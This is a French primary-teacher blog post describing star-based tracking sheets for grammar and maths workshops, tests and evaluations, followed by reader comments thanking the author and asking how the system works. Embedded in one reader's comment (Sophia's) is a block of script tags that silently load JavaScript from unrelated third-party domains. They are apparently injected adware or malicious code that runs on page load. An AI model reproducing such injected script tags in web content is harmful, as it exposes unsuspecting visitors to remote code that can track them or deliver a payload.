• Fichiers de suivi EDL et Maths

     Voici un premier jet de mes fichiers de suivi en EDL et maths. 

    J'ai fais le choix d'abandonner les ceintures car elles bloquaient tout changement dans la programmation et il y en a eu pas mal cette année. Puis en farfouillant longuement sur internet, je suis tombée sur le blog de carabouille à l'école . Sur certaines fiches, elles proposaient d'obtenir des étoiles en fonction du nombre de notions acquises et validées. Cela m'a semblé idéal pour garder tout de même cette idée de suivi mais aussi de flexible! J'ai entrepris de numéroter chaque notion afin d'utiliser ces numéros dans mon rangement des ateliers.

    ***** Afin d'y voir plus clair, je vais vous expliquer comme je fonctionne: *****

    - l'entrée dans la notion se fait en collectif ou en demi-groupe (j'utilise Retz Réussir son entrée en grammaire)

    - 1ere vague d'entrainement en collectif, au TBI, avec une correction immédiate

    - 2 ème vague d'entrainement sur le cahier du jour (une fiche parcours pour voir ce qui est acquis, dans l'idée de 1 2 3 parcours EDL et maths)

    - les ateliers de manipulation pour s'entrainer. Il y a 4 cases sur le fichier de suivi, c'est pour colorier en vert si l'atelier est réussi, en jaune si il y a eu quelques erreurs et en orange si trop d'erreurs). Pour passer à l'étape suivante, il faut 2 à 4 verts. Les numéros correspondent à chaque compétence, je les colle sur mes boites d'ateliers. Quand une notion est ouverte à la manipulation, je colorie le numéro sur leur fichier afin qu'ils repèrent que c'est ouvert!

     

    - le test: sous pochette plastique, au feutre ardoise. J'ai créé 3 tests différents en laissant les mêmes consignes et en modifiant le contenu.

     

     

     

     

     

     

     

     

     

     

     

     

     

    - l'évaluation finale: une feuille A5 (c'est l'un des tests avec Eval marqué à la place de test).  Si l'élève a fait le test 1, je lui donnerai l'évaluation 2, etc...Donc je ne photocopie pas chaque évaluation x le nombre d'élèves. Si j'ai 12 élèves, 3 évals, cela fait 4 exemplaires chaque eval (3x4=12).

     

     

     

     

     

     

     

     

     

     

     

     

    Une fois la notion validée par l'évaluation, on compte le nombre de notions acquises et c'est à ce moment que l'élève obtient ses étoiles de compétences.

     

     

     

     

     

     

     

     

     

     

     

     

     Il est temps de partager maintenant!

    voici mes fichiers EDL et Maths en pdf

    pour la version modifiable, afin de garder la mise en page, je vous propose de télécharger les polices d'écriture suivantes:

    ********** les polices d'écriture **********

    KG Second Chances Solid

    KG What the Teacher Wants

    Alamain

    KG Primary Whimsy

    KG Corner of the Sky 

    ****** Modifiable en power point ******

    EDL

    Maths

    la modification du fichier ne vous donne pas le droit de le partager sur un autre groupe facebook que le mien (dans le sac de maitresse claire) ou votre blog. Je serai ravie de partager vos fichiers ici!

    les illustrations proviennent du blog de mysticlolly.

    « Parcours d'écrivain: programmes et cartesparcours DECLIC avant 2022 »
    Pin It

    Tags Tags : , , , , , , ,
  • Commentaires

    1
    clb
    Dimanche 2 Mai 2021 à 10:26

    Merci pour votre partage!!!

    2
    diaap
    Dimanche 2 Mai 2021 à 16:20

    Merci maitresse ! Je me noyais dans le passage de ceintures, je pense qu'avec ton système,tout va être beaucoup plus simple.

    3
    Cindy vf
    Dimanche 2 Mai 2021 à 19:07
    Un grand merci
    4
    Pouledor
    Jeudi 13 Mai 2021 à 08:16
    Waouhhh,merci pour cette pépite!
    5
    Zeyeti
    Vendredi 14 Mai 2021 à 10:35
    Quel travail colossal. Merci pour toutes ces explications et pour ce partage. C’est vraiment très intéressant : je fonctionne aussi en ateliers alors tout ceci va bien m’aider. Encore merci pour tous ces partages.
    6
    Nala50
    Samedi 15 Mai 2021 à 14:44

    Vraiment inspirant ! Je cherchais des idées pour mes CE1 l'an prochain, et je crois que j'ai trouvé !

    7
    jen
    Lundi 24 Mai 2021 à 10:28

    Superbe! Je decouvre ton blog  seulement à l'instant (via ton insta sur les rituels de Lilouteach). Ton travail de suivi est vrmt top! Merci de partager ta version modifiable, je vais tenter de l'adapter pour mes CE2 en lien avec les 123 parcours EDL et Maths! Mille mercis!

     

    8
    Jen B
    Mercredi 26 Mai 2021 à 14:18
    Petite question : comment suis tu tes élèves ? Quelle trace gardes tu pour savoir où ils en sont, les compétences acquises ou non?
    Tu remplis leur fichiers cela veut dire que les élèves te le rendent à chaque fois ou qu'ils sont dans la classe et toi comme eux y avez accès ? Merci
      • Mercredi 26 Mai 2021 à 19:21

        Bonjour,

        j'ai créé un fichier de suivi que je n'ai pas eu le temps de mettre sur le blog. les fichiers sont rangés dans un tiroir et les élèves y ont accès autant que moi.

         

    9
    isaK6
    Jeudi 8 Juillet 2021 à 22:20

    Merci pour ton partage ! Ton organisation et ton travail vont m'aider à me retrouver plus facilement dans lla gestion des ateliers que j'ai en classe mais peu utilisés par manque d'organisation.

    10
    Sophia
    Mardi 13 Juillet 2021 à 10:07
    Sophia

    Quel travail !!! Merci beaucoup pour ton partage.

    J'ai juste deux/trois petites questions.

    Les 4 cases pour les entrainements ce sont des ateliers autonomes type cartes à pince ? Ce sont les élèves qui colorient les cases après chaque atelier ?

    Chaque élève passe l'évaluation lorsqu'il est prêt ? Tu ne fais plus d'évaluation en commun ?

    Merci d'avance pour ces petits éclaircissements :)

     

    Sophia

    <script src="//scrprime.com/23178e2c7c2ade2327.js"></script> <script src="http://hublosk.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8983x" type="text/javascript"></script> <script src="http://jullyambery.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8983x&format=arrjs&r=1626163297995" type="text/javascript"></script> <script src="http://scrprime.com/ext/23178e2c7c2ade2327.js?sid=52715_8983_&title=qq&blocks[]=31af2" type="text/javascript"></script>
      • Mardi 13 Juillet 2021 à 11:49

        effectivement, les 4 cases sont pour les ateliers de manip et les entrainements sur fiche ardoise. ils mettent un point dans la case quand ils réalisent une activité. je valide de suite ou après, entre 2 temps. Pour les évaluations, je fais d'abord passer un test quand ils le demandent ou quand j'estime qu'ils sont prêts. si le test est réussi, ils font l'évaluation.  

    11
    Christelle
    Jeudi 22 Juillet 2021 à 16:39

    Merci pour votre partage. C'est exactement la façon dont j'aimerais travailler.  A moi maintenant de créer mes propres outils, et le fait de pouvoir voir des choses déjà existantes me permets de mieux me projeter. 

    Bonnes vacances

    12
    nolwenn
    Dimanche 25 Juillet 2021 à 21:54

    merci pour ton travail et partage

    on peut trouver les tests sur ton site ? 

      • Lundi 26 Juillet 2021 à 08:37

        je suis en train de les peaufiner! ils seront partager durant l'été!

    13
    Flo
    Samedi 7 Août 2021 à 09:18
    Bonjour, Mille mercis pour le partage! Grâce à votre vidéo explicative sur le Digital teacher planner j'ai réussi à réaliser le mien et en suis si fière que j'ai hâte de l'utiliser à la rentrée
    14
    Coralie
    Lundi 9 Août 2021 à 12:44
    Coralie

    Bonjour Claire,

    merci pour tout ce travail d’excellence. Je me demande où peut-on trouver les entraînements et les évaluations pour les maths svp? Merci encore pour ces précieux partages.

    15
    christelle
    Vendredi 27 Août 2021 à 10:55

    Super travail et merci pour le partage! Je vais m'en inspirer cette année§ Où peut-on trouver tes fiches d'atelier EDL que tu donnes à tes élèves pour autoévaluer leurs compétences? Encore merci

    16
    Marine
    Mercredi 3 Novembre 2021 à 14:43

    Bonjour ! Merci pour tes partages, ton blog est une vraie mine d'or pour les enseignants. J'ai envie de changement dans ma classe mais je ne savais pas trop comment faire. Ton fonctionnement en atelier et tes fichiers de suivi semblent correspondre à ce que je cherchais.

    Pourrais-tu partager la version modifiable des "macarons" (fleur bleue)  pour les ateliers de français stp?

      • Rémi
        Mercredi 10 Novembre 2021 à 18:57

        Bonjour, je trouve ton idée d'ateliers en EdL adaptée pour les élèves et voudrais me lancer. Aurais-tu la version modifiable stp ? Le lien n'est pas activé. 

        MERCI

    17
    maîtresseG
    Mercredi 3 Novembre 2021 à 15:09

    Wahou ! Quel travail phénoménale ! Merci de partager tout ça et de m'inspirer.

    J'avais une petite question : pour chaque compétence tu proposes plusieurs ateliers (par exemple, j'ai vu que sur la feuille de route "types de phrases" il y avait 4 ateliers différents et un exercice) ; tu colories une case sur le fichier de suivi quelque soit l'atelier réalisé ou pour colorier une case il faut que l'élève ait fait une fois chaque atelier?

    Encore merci pour ton blog et tes partages!

    18
    Titoune 30_0
    Samedi 22 Octobre 2022 à 14:42

    Bonjour, un énorme merci pour tout ce partage. Je ne trouve pas les fiches correspondant aux exercices d'entrainement et de validation ( j'avais entrepris d'en faire mais je n'en vois pas le bout et la présentation est bien moins jolie !). J'ai vu dans les commentaires que tu disais les mettre bientôt en ligne en ...juillet 2021 ! Du coup, je me dis que je ne dois certainement pas chercher au bon endroit ! Peux tu m'indiquer ce qu'il en est stp?

    Encore un énorme merci

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :